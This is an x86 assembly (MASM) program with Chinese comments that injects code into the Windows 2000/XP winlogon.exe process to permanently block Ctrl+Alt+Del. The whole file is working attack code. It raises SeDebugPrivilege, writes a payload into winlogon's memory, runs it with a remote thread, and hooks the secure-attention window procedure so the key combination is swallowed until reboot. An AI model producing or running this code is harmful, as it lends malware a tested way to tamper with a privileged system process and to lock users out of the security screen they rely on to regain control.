;在window2k&XP下屏蔽Ctrl+Alt+del
;by 来自轻院的狼[immlep]
;www.ptteam.com
;http://immlep.blogone.net
;注射代码到winlogon.exe,接管SAS消息处理函数,屏蔽Ctrl+Alt+del
;注:本注射的代码中还没有实现卸载的方法,运行本程序后.Ctrl+Alt+del将会一直被屏蔽,除非重启或自己卸载代码.
.386
.model flat,stdcall
option casemap :none
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
includelib kernel32.lib
includelib user32.lib
includelib advapi32.lib
NewSASProc PROTO :HWND,:UINT,:WPARAM,:LPARAM
szText MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl
Name db Text,0
lbl:
ENDM
.data
hProcess dd 0
hSnapshot dd 0
ph dd 0
szUserBase dd 0
injection_base dd 0
dwSize dd 0
szkernel32 db 'kernel32.dll',0
szuser32 db 'user32.dll',0
szSetWindowLong db 'SetWindowLongA',0
szFindWindow db 'FindWindowA',0
szCallWindowProc db 'CallWindowProcA',0
szExitThread db 'ExitThread',0
szWinlogon db 'winlogon.exe',0
uProcess PROCESSENTRY32 <0>
szfname db 0 dup(30h)
.code
_injection:
call @F
szwindowtext db 'SAS window',0
@@:
call @F
szclass db 'SAS Window class',0
@@:
db 0B8h
_FindWindow dd 0
call eax ;查找窗口
call Local1
Local1:
add dword ptr[esp],offset LocalX-offset Local1 ;NewSASProc
push GWL_WNDPROC
push eax
db 0B8h
_SetWindowLong dd 0 ;修改窗口处理地址,让我们的代码接管
call eax
push eax
call @F
OldSASPro dd 0
@@:
pop eax
pop [eax]
push 0
db 0b8h
_ExitThread dd 0
call eax
LocalX:
;-------------------------
;新的窗口处理函数
;-------------------------
NewSASProc proc hWin:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
mov eax,uMsg
.if eax==WM_HOTKEY
.if lParam==02E0003h
mov eax,0 ;屏蔽
.endif
comment ~
;下面代码与上面代码等价
mov eax,lParam
push edx
mov edx,VK_DELETE
shl edx,10h
mov dx,VK_CONTROL
xor dx,VK_ALT ;VK_ALT==12h
cmp eax,edx
jnz @F
mov eax,0
@@:
pop edx ~
.else
push lParam
push wParam
push uMsg
push hWin
call @F
@@:
pop eax
sub eax,03Eh ;OldSASPro
push [eax]
db 0B8h
_CallWindowProc dd 0
call EAX
.endif
ret
NewSASProc endp
injection_size equ $-_injection
Start:
invoke LoadLibrary,addr szkernel32
invoke GetProcAddress,eax,addr szExitThread
mov _ExitThread,eax
invoke LoadLibrary,addr szuser32
mov szUserBase,eax
invoke GetProcAddress,eax,addr szSetWindowLong
mov _SetWindowLong,eax
invoke GetProcAddress,szUserBase,addr szFindWindow
mov _FindWindow,eax
invoke GetProcAddress,szUserBase,addr szCallWindowProc
mov _CallWindowProc,eax
call _EnableDebugPrivilege
invoke CreateToolhelp32Snapshot, 2, 0
mov hSnapshot, eax
mov uProcess.dwSize, sizeof uProcess
invoke Process32First, hSnapshot, ADDR uProcess
mov hProcess, eax
.while hProcess!=0
lea eax,uProcess.szExeFile
invoke lstrcmp,addr szWinlogon,eax
jnz @F
invoke OpenProcess, PROCESS_ALL_ACCESS, NULL,uProcess.th32ProcessID
mov ph, eax
jmp skip
@@:
invoke Process32Next, hSnapshot, ADDR uProcess
mov hProcess, eax
.endw
skip:
invoke CloseHandle, hSnapshot
invoke VirtualAllocEx,ph,NULL,injection_size,MEM_COMMIT,PAGE_EXECUTE_READWRITE
mov injection_base, EAX
invoke WriteProcessMemory,ph,EAX,addr _injection,injection_size,NULL
invoke CreateRemoteThread,ph,NULL, 0,injection_base,NULL, 0, 0
invoke CloseHandle,ph
invoke ExitProcess,NULL
_EnableDebugPrivilege proc
local @hToken
local @tp:TOKEN_PRIVILEGES
szText SE_DEBUG_NAME_Y,"SeDebugPrivilege"
invoke GetCurrentProcess
lea ecx,@hToken
invoke OpenProcessToken,eax,TOKEN_ALL_ACCESS,ecx
mov @tp.PrivilegeCount,1
invoke LookupPrivilegeValue,NULL,addr SE_DEBUG_NAME_Y,addr @tp.Privileges[0].Luid
mov @tp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,@hToken,FALSE,addr @tp,sizeof @tp,NULL,NULL
push eax
invoke CloseHandle,@hToken
pop eax
ret
_EnableDebugPrivilege endp
end Start
编译链接时要将代码段设为可写